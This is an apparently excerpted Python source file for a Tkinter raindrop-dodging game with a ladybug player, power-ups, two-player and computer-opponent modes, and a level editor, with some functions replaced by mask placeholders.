data.notClick\n data.fast = data.notClick\n data.drizzle = data.notClick\n data.rain = data.notClick\n data.thunderstorm = data.notClick\n init3(data)\n\n\ndef init3(data):\n data.yes = data.notClick\n data.no = data.notClick\n data.enter = data.notClick\n data.levelEditorLives = 2\n data.rSpeed = None\n data.start = None\n data.start1 = None\n data.start2 = None\n data.difficulty = None\n data.mode1 = data.notClick\n data.mode2 = data.notClick\n data.mode3 = data.notClick\n data.mode4 = data.notClick\n data.mode5 = data.notClick\n data.mode6 = data.notClick\n data.home = PhotoImage(file='home.gif')\n data.helpScreen = PhotoImage(file='help1.gif')\n data.title = PhotoImage(file='title.gif')\n data.scoreList = []\n data.spotList = [270, 364, 458, 552, 646, 740]\n data.savedScores = readFile('score.txt')\n if data.mode == 'levelCreated':\n 
setEverything(data)\n initsplashScreenNumbers(data)\n\n\ndef initsplashScreenNumbers(data):\n data.splashButtonY = 425\n data.p1ButtonX = 225\n data.p2ButtonX = 290\n data.edButton = 355\n data.diffButton = 425\n data.helpButton = 490\n data.sboardButton = 555\n data.hitPenalty = 75\n data.splashText = data.height / 2 - 20\n data.lives = 2\n data.levelMax = 8\n data.lane = 94\n data.Player1Min = 270\n data.Player1Max = 740\n data.homeX = 50\n data.homeY = 650\n initScoreBoardHelp(data)\n init1Player(data)\n\n\n<mask token>\n\n\ndef init1Player(data):\n data.buffer = 40\n\n\ndef initAI(data):\n data.AITY = 225\n data.easyX = 200\n data.easyY = 300\n data.medX = 400\n data.hardX = 600\n data.enterY = 450\n data.difS = 4\n data.difM = 6\n data.difH = 8\n data.last = 500\n data.enterX = 575\n data.PUT = 450\n data.RST = 350\n data.YST = 250\n\n\ndef mousePressed(event, data):\n if data.mode == 'splashScreen':\n splashScreenMousePressed(event, data)\n elif data.mode == '1Player':\n playerMousePressed(event, data)\n elif data.mode == '2Player':\n twoPlayerMousePressed(event, data)\n elif data.mode == 'editor':\n editorMousePressed(event, data)\n elif data.mode == 'levelCreated':\n levelCreatedMousePressed(event, data)\n elif data.mode == 'AI':\n AIMousePressed(event, data)\n elif data.mode == 'difficulty':\n difficultyMousePressed(event, data)\n elif data.mode == 'scoreboard':\n scoreboardMousePressed(event, data)\n elif data.mode == 'help':\n helpMousePressed(event, data)\n\n\n<mask token>\n\n\ndef timerFired(data):\n if data.mode == 'splashScreen':\n splashScreenTimerFired(data)\n elif data.mode == '1Player':\n playerTimerFired(data)\n elif data.mode == '2Player':\n twoPlayerTimerFired(data)\n elif data.mode == 'editor':\n editorTimerFired(data)\n elif data.mode == 'levelCreated':\n levelCreatedTimerFired(data)\n elif data.mode == 'AI':\n AITimerFired(data)\n elif data.mode == 'difficulty':\n difficultyTimerFired(data)\n elif data.mode == 'scoreboard':\n 
scoreboardTimerFired(data)\n elif data.mode == 'help':\n helpTimerFired(data)\n\n\ndef redrawAll(canvas, data):\n if data.mode == 'splashScreen':\n splashScreenRedrawAll(canvas, data)\n elif data.mode == '1Player':\n playerRedrawAll(canvas, data)\n elif data.mode == '2Player':\n twoPlayerRedrawAll(canvas, data)\n elif data.mode == 'editor':\n editorRedrawAll(canvas, data)\n elif data.mode == 'levelCreated':\n levelCreatedRedrawAll(canvas, data)\n elif data.mode == 'AI':\n AIRedrawAll(canvas, data)\n elif data.mode == 'difficulty':\n difficultyRedrawAll(canvas, data)\n elif data.mode == 'scoreboard':\n scoreboardRedrawAll(canvas, data)\n elif data.mode == 'help':\n helpRedrawAll(canvas, data)\n\n\n<mask token>\n\n\ndef splashKeyPressed(event, data):\n pass\n\n\ndef splashScreenTimerFired(data):\n data.splashScreenTime += 1\n if data.splashScreenTime % 2 == 1:\n rainDropSplash(data)\n for drop in data.splashScreenDrops:\n drop.onTimerFired(data)\n\n\ndef splashScreenButtons(canvas, data):\n canvas.create_image(data.splashButtonY, data.p1ButtonX, image=data.mode1)\n canvas.create_image(data.splashButtonY, data.p2ButtonX, image=data.mode2)\n canvas.create_image(data.splashButtonY, data.edButton, image=data.mode3)\n canvas.create_image(data.splashButtonY, data.diffButton, image=data.mode4)\n canvas.create_image(data.splashButtonY, data.helpButton, image=data.mode5)\n canvas.create_image(data.splashButtonY, data.sboardButton, image=data.mode6\n )\n\n\ndef rainDropSplash(data):\n xPosition = random.randint(0, 800)\n data.splashScreenDrops.append(Coconuts(xPosition, 0))\n\n\ndef splashScreenRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.splashText - 10, image=data.title)\n for drop in data.splashScreenDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.splashText, text=\n \"\"\"\n 1.) Single Player Level Mode\n\n\n 2.) Two-Player Mode\n\n \n 3.) Level Creator Practice Mode\n\n \n 4.) Play Against the Computer\n\n \n 5.) 
Help and Instructions\n\n \n 6.) Scoreboard\n\n \n \"\"\"\n , font='Arial 14 bold', fill='yellow')\n splashScreenButtons(canvas, data)\n\n\ndef writeFile(path, contents):\n with open(path, 'wt') as f:\n f.write(contents)\n\n\ndef readFile(path):\n with open(path, 'rt') as f:\n return f.read()\n\n\nclass Coconuts(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.r = 9\n self.fill = 'deep sky blue'\n self.speed = 30\n self.outline = 'blue'\n\n def draw(self, canvas):\n canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r,\n self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill=\n self.fill, outline=self.outline, width=3)\n\n def onTimerFired(self, data):\n self.y += self.speed\n\n\ndef hit(data):\n for coconut in data.coconuts:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r:\n if (coconut.x >= data.cx - data.r and coconut.x <= data.cx +\n data.r):\n data.cy += data.hitPenalty\n if data.mode == 'levelCreated':\n data.lives -= 1\n elif data.hit == False and data.level < data.levelMax:\n data.score -= data.level\n data.coconuts.remove(coconut)\n if data.mode == 'levelCreated':\n data.levelEditorLives -= 1\n\n\ndef hit2Player(data):\n if data.mode == '2Player':\n if data.Invincible1 == False:\n for coconut in data.coconuts1:\n if (coconut.y >= data.player1Y - data.r and coconut.y <= \n data.player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <=\n data.player1X + data.r):\n data.player1Y += data.hitPenalty\n data.coconuts1.remove(coconut)\n if data.Invincible2 == False:\n for coconut in data.coconuts2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= \n data.player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <=\n data.player2X + data.r):\n data.player2Y += data.hitPenalty\n data.coconuts2.remove(coconut)\n\n\nclass PowerUps(Coconuts):\n\n def __init__(self, x, y):\n super().__init__(x, 
y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.hourGlass)\n\n\ndef hitPause(data):\n for powerUp in data.powerUps:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.pauseDrops = True\n data.start = data.cy\n data.powerUps.remove(powerUp)\n elif data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.pause1Drop = True\n data.start1 = data.player1Y\n data.powerUps.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.pause2Drop = True\n data.start2 = data.player2Y\n data.powerUps.remove(powerUp)\n\n\nclass Invincible(PowerUps):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.umbrella)\n\n\ndef hitInvincible(data):\n for powerUp in data.invincible:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.beInvincible = True\n data.start = data.cy\n data.invincible.remove(powerUp)\n if data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.Invincible1 = True\n data.start1 = data.player1Y\n data.invincible.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and 
powerUp.x <= \n data.player2X + data.r):\n data.Invincible2 = True\n data.start2 = data.player2Y\n data.invincible.remove(powerUp)\n\n\nclass ScaryBug(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.speed = 25\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.spider)\n\n def onTimerFired(self, data):\n if data.mode == '2Player' or data.mode == 'AI':\n self.speed = 35\n self.y -= self.speed\n if (data.mode == '1Player' or data.mode == 'levelCreated' and data.\n time % 8 == 0):\n side = random.choice(data.sides)\n if side == 'l':\n if self.x - data.lane >= data.Player1Min:\n self.x -= data.lane\n else:\n self.x += data.lane\n elif side == 'r':\n if self.x + data.lane <= data.Player1Max:\n self.x += data.lane\n else:\n self.x -= data.lane\n\n\ndef hitScaryBug(data):\n for bug in data.scaryBug:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if (bug.y >= data.cy - 1.5 * data.r and bug.y <= data.cy + 1.5 *\n data.r):\n if (bug.x >= data.cx - 1.5 * data.r and bug.x <= data.cx + \n 1.5 * data.r):\n data.hit = True\n data.lives = 0\n data.levelEditorLives = 0\n if data.mode == '2Player' or data.mode == 'AI':\n if (bug.y >= data.player1Y - data.r and bug.y <= data.player1Y +\n data.r):\n if (bug.x >= data.player1X - data.r and bug.x <= data.\n player1X + data.r):\n data.winner = 'player2'\n if (bug.y >= data.player2Y - data.r and bug.y <= data.player2Y +\n data.r):\n if (bug.x >= data.player2X - data.r and bug.x <= data.\n player2X + data.r):\n data.winner = 'player1'\n\n\ndef drawPowerups(canvas, data):\n for bug in data.scaryBug:\n bug.draw(canvas, data)\n for powerUp in data.powerUps:\n powerUp.draw(canvas, data)\n for powerUp in data.invincible:\n powerUp.draw(canvas, data)\n\n\ndef drawHome(canvas, data):\n canvas.create_image(data.homeX, data.homeY, image=data.home)\n\n\n<mask token>\n\n\ndef powerUpCoconutShot(data):\n if data.time % 60 == 0 and data.time % 120 != 0:\n Position = 
random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 50 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 100 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef playerRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 50, text='Level: %d' % data.level,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(data.width / 6, 80, text='Score: %d' % data.score,\n font='Arial 18 bold', fill='yellow')\n canvas.create_text(2 * data.width / 3, 660, text=\n \"\"\"The greater the level, the more points get\n added to your score!\"\"\"\n , font='Arial 15 bold', fill='yellow')\n if data.hit == True:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! 
Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n canvas.create_text(data.width / 2, 280, text='Score: %d' % data.\n score, font='Arial 13 bold', fill='yellow')\n if data.level >= 8:\n madeIt(canvas, data)\n drawHome(canvas, data)\n\n\ndef madeIt(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 70, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n canvas.create_text(data.width / 2, 100, text='Score: %d' % data.score,\n font='Arial 15 bold', fill='yellow')\n canvas.create_text(data.width / 2, 375, text=\n 'Congrats! Enter your Name!', font='Arial 15 bold', fill='yellow')\n canvas.create_rectangle(data.width / 2 - 50, 400, data.width / 2 + 50, \n 450, fill='white')\n canvas.create_text(data.width / 2, 425, text=data.name)\n\n\ndef drop2Player(data):\n if data.winner == None and data.pauseDrops == False:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 25 and abs(xPosition1 - 360) > 25:\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 12 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconuts1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconuts2.append(Coconuts(755, 0))\n powerupDrop2Player(data)\n\n\ndef powerupDrop2Player(data):\n if data.time % 45 == 0 and data.time % 90 != 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n 
data.powerUps.append(PowerUps(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n if data.time % 60 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 90 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(540, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(755, 750))\n\n\ndef twoPlayerKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n if data.winner == None:\n if event.keysym == 'a' and data.onLeft1 == False:\n data.onLeft1 = True\n data.player1X = 150\n if event.keysym == 'd' and data.onLeft1 == True:\n data.onLeft1 = False\n data.player1X = 330\n if event.keysym == 'Left' and data.onLeft2 == False:\n data.onLeft2 = True\n data.player2X = 550\n if event.keysym == 'Right' and data.onLeft2 == True:\n data.onLeft2 = False\n data.player2X = 750\n\n\ndef twoPlayerMousePressed(event, data):\n checkHome(event, data)\n\n\ndef twoPlayerTimerFired(data):\n if data.winner == None:\n data.player1Y -= data.speed\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n drop2Player(data)\n data.player2Y -= data.speed\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n drop2Player(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in 
data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n powerupTimerFired(data)\n\n\ndef powerupTimerFired(data):\n for coconut in data.coconuts1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n hit2Player(data)\n for coconut in data.coconuts2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef twoPlayerRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts1:\n coconut.draw(canvas)\n for coconut in data.coconuts2:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n canvas.create_text(50, 40, text='Player 1', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 2', font='Arial 15 bold', fill\n ='yellow')\n winner(canvas, data)\n drawHome(canvas, data)\n\n\ndef winner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! 
Player 1', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 2', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef editorKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef editorMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.yourSpeed = 'slow'\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.yourSpeed = 'medium'\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.yourSpeed = 'fast'\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n checkMiddle(event, data)\n checkLast(event, data)\n\n\ndef checkMiddle(event, data):\n if data.medX - data.r <= event.y <= data.medX + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.rainSpeed = 'drizzle'\n data.drizzle = data.click\n data.rain, data.thunderstorm = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.rainSpeed = 'rain'\n data.rain = data.click\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\n if data.hardX 
- 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.rainSpeed = 'thunderstorm'\n data.thunderstorm = data.click\n data.drizzle, data.rain = data.notClick, data.notClick\n\n\n<mask token>\n\n\ndef drawButtons(canvas, data):\n data.font, data.fill = 'Helvetica 13 bold', 'yellow'\n canvas.create_text(data.medX, data.YST, text='Your Speed:', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\n canvas.create_text(data.easyX, data.easyY, text='Slow', font=data.font)\n canvas.create_image(data.medX, data.easyY, image=data.medium)\n canvas.create_text(data.medX, data.easyY, text='Medium', font=data.font)\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\n canvas.create_text(data.hardX, data.easyY, text='Fast', font=data.font)\n canvas.create_image(data.easyX, data.medX, image=data.drizzle)\n canvas.create_text(data.medX, data.RST, text='Rain Speed:', font=data.\n font, fill=data.fill)\n canvas.create_text(data.easyX, data.medX, text='Drizzle', font=data.font)\n canvas.create_image(data.medX, data.medX, image=data.rain)\n canvas.create_text(data.medX, data.medX, text='Rain', font=data.font)\n canvas.create_image(data.hardX, data.medX, image=data.thunderstorm)\n canvas.create_text(data.hardX, data.medX, text='Heavy', font=data.font)\n canvas.create_text(data.medX, data.PUT, text='PowerUps?', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyY, data.last, image=data.yes)\n canvas.create_text(data.easyY, data.last, text='Yes', font=data.font)\n canvas.create_image(data.last, data.last, image=data.no)\n canvas.create_text(data.last, data.last, text='No', font=data.font)\n changeEnter(canvas, data)\n\n\ndef changeEnter(canvas, data):\n if (data.powerUpsEditor != None and data.yourSpeed != None and data.\n rainSpeed != None):\n data.enter = data.click\n canvas.create_image(data.medX, data.enterX, image=data.enter)\n canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font)\n\n\ndef 
editorTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef editorRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.S_P - 10, text=\n 'Edit Your Level!', font='Arial 23 bold', fill='yellow')\n drawButtons(canvas, data)\n drawHome(canvas, data)\n\n\ndef setEverything(data):\n if data.yourSpeed == 'slow':\n data.speed = 6\n elif data.yourSpeed == 'medium':\n data.speed = 10\n elif data.yourSpeed == 'fast':\n data.speed = 14\n if data.rainSpeed == 'thunderstorm':\n data.rSpeed = 7\n elif data.rainSpeed == 'rain':\n data.rSpeed = 10\n elif data.rainSpeed == 'drizzle':\n data.rSpeed = 13\n\n\n<mask token>\n\n\ndef levelPowerUp(data):\n if data.powerUpsEditor == True:\n if data.time % 20 == 0 and data.time % 40 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 30 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 35 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef levelCreatedMousePressed(event, data):\n checkHome(event, data)\n\n\ndef levelCreatedTimerFired(data):\n setEverything(data)\n if data.levelEditorLives > 0:\n data.cy -= data.speed\n if data.cy < 15:\n data.level += 1\n if data.cy > 40:\n data.time += 1\n if data.pauseDrops != True:\n levelCoconutShot(data)\n if data.powerUpsEditor == False:\n for coconut in data.coconuts:\n coconut.onTimerFired(data)\n hit(data)\n if data.powerUpsEditor == True:\n for powerUp in data.powerUps:\n 
powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n for coconut in data.coconuts:\n if data.pauseDrops == False:\n coconut.onTimerFired(data)\n if data.beInvincible == False:\n hit(data)\n if data.start != None:\n if abs(data.start - data.cy) >= 120:\n data.pauseDrops, data.beInvincible = False, False\n\n\ndef levelCreatedRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n if data.powerUpsEditor == True:\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 100, text='Total Lives: %d' % data.\n levelEditorLives, font='Arial 20 bold', fill='yellow')\n canvas.create_text(data.width / 2, 660, text=\n \"\"\"You lose a life for hitting a drop\n & don't get eaten!\"\"\",\n font='Arial 15 bold', fill='yellow')\n if data.levelEditorLives <= 0:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! 
Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n if data.level > 1:\n winEditor(canvas, data)\n drawHome(canvas, data)\n\n\ndef winEditor(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef difficultyMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.difficulty = data.difS\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.difficulty = data.difM\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.difficulty = data.difH\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n if data.enter == data.click:\n if data.enterY - data.r <= event.y <= data.enterY + data.r:\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.mode = 'AI'\n\n\ndef difficultyTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef difficultyRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawDifficulties(canvas, data)\n drawHome(canvas, data)\n\n\ndef hitAI1(data, distance):\n for coconut in data.coconutsAI1:\n if 
(data.player1Y - data.r - coconut.y <= distance and data.\n switchOnProgress == False):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r or AISwitchBug(data, distance) == True):\n testInt = random.randint(0, 9)\n if testInt <= data.difficulty:\n data.switchOnProgress = True\n if data.player1X == 150:\n data.player1X = 340\n else:\n data.player1X = 150\n data.switchOnProgress = False\n if (coconut.y >= data.player1Y - data.r and coconut.y <= data.\n player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r):\n data.player1Y += 50\n data.coconutsAI1.remove(coconut)\n\n\ndef AISwitchBug(data, distance):\n for scaryBug in data.scaryBug:\n if (data.player1Y - data.r - scaryBug.y <= distance and data.\n switchOnProgress == False):\n if (scaryBug.x >= data.player1X - data.r and scaryBug.x <= data\n .player1X + data.r):\n return True\n\n\ndef hitAI2(data, distance):\n for coconut in data.coconutsAI2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= data.\n player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <= data.\n player2X + data.r):\n data.player2Y += 50\n data.coconutsAI2.remove(coconut)\n\n\ndef coconutShotAI(data):\n if data.winner == None:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40:\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 8 == 0:\n xPosition2 = random.randint(0, 80)\n xPosition3 = random.randint(364, 385)\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition2, 0))\n data.coconutsAI1.append(Coconuts(xPosition3, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0))\n data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0))\n addExtraCoconut(data)\n 
addPowerUpsAI(data)\n\n\n<mask token>\n\n\ndef addPowerUpsAI(data):\n if data.time % 33 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 66 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(550, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(750, 750))\n\n\n<mask token>\n\n\ndef AITimerFired(data):\n if data.winner == None:\n if data.Invincible1 == False:\n hitAI1(data, 31)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 31)\n for coconut in data.coconutsAI1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n for coconut in data.coconutsAI2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.Invincible1 == False:\n hitAI1(data, 13)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 13)\n data.player1Y -= data.speedAI\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n 